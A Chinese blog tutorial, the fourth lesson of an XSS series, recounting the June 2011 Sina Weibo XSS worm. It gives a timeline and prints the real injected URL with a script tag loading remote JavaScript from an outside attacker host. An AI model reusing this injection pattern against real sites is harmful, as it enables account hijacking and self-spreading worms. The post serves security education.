XSS第四节,XSS攻击实例(一)
来源:互联网 发布:适合编程的笔记本2017 编辑:程序博客网 时间:2024/05/16 06:45
在开始实例的讲解之前,先看一下XSS的危害情况,第一张图中说明和XSS相关的CVE漏洞有7417个(http://web.nvd.nist.gov/view/vuln/search-results?query=xss&search_type=all&cves=on),第二张图说明在了乌云漏洞平台(www.wooyun.org)上和XSS相关的漏洞有2360个,足见XSS威力还是很大的。
这次举的例子是2011年6月28日新浪微博XSS攻击事件
事件的经过线索如下:
20:14,开始有大量带V的认证用户中招转发蠕虫
20:30,2kt.cn中的病毒页面无法访问
20:32,新浪微博中hellosamy用户无法访问
21:02,新浪漏洞修补完毕
新浪微博事件是利用了微博广场页面 http://weibo.com/pub/star 的一个URL注入了js脚本,其通过http://163.fm/PxZHoxn 短链接服务,将链接指向:http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update
其中的地址为:< script src="//www.2kt.cn/images/t.js"></script>,下面附一张来自腾讯科技的配图,
当时大多数分析者认为 Chrome 和 Safari 都没中招,IE、Firefox未能幸免。但IE8以后自动开启了XSS防御,所以普通用户使用IE8以上版本和Chrome以及Safari还是能防范普通XSS攻击的。
- XSS第四节,XSS攻击实例(一)
- XSS与CSRF攻击相关知识(一) XSS
- XSS跨站脚本攻击(一)
- web攻击手段(一)XSS
- xss-javascript被攻击系列--(一)
- XSS攻击(二)
- XSS攻击
- XSS攻击
- XSS攻击
- XSS攻击
- XSS攻击
- XSS攻击
- xss攻击
- XSS攻击
- XSS攻击
- XSS攻击
- xss攻击
- XSS攻击
- 我的新的里程--android学习
- 笔记:PGA(二)
- ASP.NET前台JS与后台CS函数如何互相调用
- Android事件传递机制【Touch事件】
- Kobject相关
- XSS第四节,XSS攻击实例(一)
- 写出高性能SQL语句的35条方法 分享
- Poj_1002_java解决
- TCP IP之TIME_WAIT状态
- 每个程序员都应该知道的那些事儿
- 初来乍到
- css控制强制换行
- 内链一定要做到高品质
- 矩阵的乘法